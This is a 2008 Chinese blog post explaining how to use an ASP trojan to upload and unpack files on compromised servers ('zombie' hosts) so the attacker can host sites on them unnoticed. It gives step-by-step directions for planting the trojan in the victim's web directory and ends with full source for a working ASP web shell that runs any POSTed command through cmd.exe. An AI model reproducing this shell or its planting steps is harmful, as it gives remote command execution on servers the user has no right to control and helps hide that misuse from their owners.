用ASP木马实现FTP和解压缩

时间:2008-02-13 08:47:00 

我想大家都有一些开了80端口的肉 * ,如果是国内的出于安全就不要往下看了,如果不不妨往下看一下,小弟献丑了,以求抛砖引玉。


在肉鸡上放网站最麻烦的可能就是更新和上传大量的文件了,终端服务大白天容易被发现,自己开个ftp又不放心.自己在网上转了一圈发现通过结合无组件上传和ASP木马可以轻松实现。

asp木马大家都很熟悉,无非就是一个cmd,有什么作用啊,你别急,听我慢慢说嘛.整体思路就是先通过ftp,139,或者winshell上传一个无组件asp程序。我选择了化境的Webedit(其实这个已经不是一个单纯的无组件上传的工具了,通过它还可以修改,删除文件/目录,可以用来更新页面喔,作起来广告了,我跟他没亲戚啊,闪过一个flying bottle..继续)和一个asp木马(如果,实在懒得找。最后带着源码,粘贴另存为asp文件即可),记住可都要在肉鸡的web目录喔.其实大多的问题webedit都可以解决,不过如果有很多文件一个一个上传可就麻烦了,怎么办?

这下asp木马用上了。找一个rar.exe(所有装过了winrar的目录都有,说不定肉鸡上已经安好了,如果是别的命令行的解压缩工具也可以喔)把它拷到%SystemRoot%\system32\下。上传.zip或者.rar文件到该肉鸡的web目录。在浏览器地址栏里打开asp木马(暂时称之为trojan.asp),在text文本框里输入rar -x source.rar path解压缩成功,V,且慢如何得到web目录的绝对路径(path)呢?我用的是用土方法,修改trojan.asp加入一行转换虚拟目录成绝对路径并输出的语句<% =server.mappath(".") %>,"."可以随意改成任何的相对虚拟目录。


只是提供一个思路,如果哪个牛人可写一个asp的解压缩那更好喽,不过?谁会呢,我不会,你会吗?至于如何隐藏虚拟目录,支持简体中文显示等就不是该篇的讨论之列了,老话,安全第一,一般放个小的论坛或聊天室就可以了,如果真放个个人主页,还把自己的联系地址,电话号码也留给人家就不太好了.ps.junesun建议直接作成自解压,不知会不会弹出对话框。


<%@ Language=VBScript %> 
<% 
 Dim oScript 
 Dim oScriptNet 
 Dim oFileSys, oFile 
 Dim szCMD, szTempFile 
 On Error Resume Next 
 < 
  ' -- create the COM objects that we will be using -- ' 
  Set oScript = Server.createObject("WSCRIPT.SHELL") 
  Set oScriptNet = Server.createObject("WSCRIPT.netWORK") 
  Set oFileSys = Server.createObject("Scripting.FileSystemObject") < 
  ' -- check for a command that we have posted -- ' 
  szCMD = Request.form(".CMD") 
  If (szCMD <> "") Then < 
   ' -- Use a poor man's pipe ... a temp file -- ' 
   szTempFile = "C:\" & oFileSys.GetTempName( ) 
   Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
   Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) < 
  End If < 
%> 
<HTML> 
<BODY> 
 <form action="<%= Request.ServerVariables("URL") %>" method="POST"> 
  <input type=text name=".CMD" size=45 value="<%= szCMD %>"> 
  <input type=submit value="Run"> 
 </form> 
<PRE> < 
 <% 
  If (IsObject(oFile)) Then 
   ' -- Read the output from our command and remove the temp file -- ' 
   On Error Resume Next 
   Response.Write Server.HTMLEncode(oFile.ReadAll) 
   oFile.Close 
   Call oFileSys.deleteFile(szTempFile, True) 
  End If 
 %> 
</BODY> 
</HTML>


标签:木马,ftp,压缩,asp
0
投稿

猜你喜欢

  • 给Notepad++换主题

    2009-05-04 14:43:00
  • 关于document.createDocumentFragment()

    2009-04-05 16:04:00
  • 在页面中动态载入外部javascript

    2007-09-30 12:52:00
  • 搜索关键字加亮js实现方法

    2007-08-27 14:11:00
  • 解决MySQL 5数据库连接超时问题

    2009-03-25 15:24:00
  • DIV+CSS常见错误及解决方法

    2008-04-25 22:46:00
  • 如何从MySQL数据库表中检索数据

    2008-11-01 17:08:00
  • 中国目前流行的网页设计风格

    2007-12-20 12:57:00
  • JavaScript版的DateAdd、DateDiff、IsDate函数

    2008-01-30 15:35:00
  • SQL0290N表空间状态问题:停顿的独占处理

    2008-12-26 17:24:00
  • 如何解决因使用On Error Resume Next导致错误不正确的问题?

    2009-12-16 18:34:00
  • 数字人组件反写[asp组件开发实例3]

    2009-06-09 13:16:00
  • 几种修复ACCESS数据库的实用方法

    2008-11-20 17:37:00
  • 表单制作方式大比拼

    2008-10-09 11:32:00
  • 在SQL Server数据库开发中的十大问题

    2008-12-18 14:39:00
  • 鼠年发几张可爱老鼠的表情gif

    2008-01-29 12:50:00
  • ASP新闻分页,将一篇过长的文章分页,生成静态页面

    2011-04-10 11:14:00
  • 几个好用的Asp自定义函数

    2007-09-26 14:28:00
  • 用Dreamweaver设计Wordpress留言板教程(一)

    2010-03-17 15:44:00
  • ASP用户登录模块的设计

    2008-11-21 16:55:00
  • asp之家 网络编程 m.aspxhome.com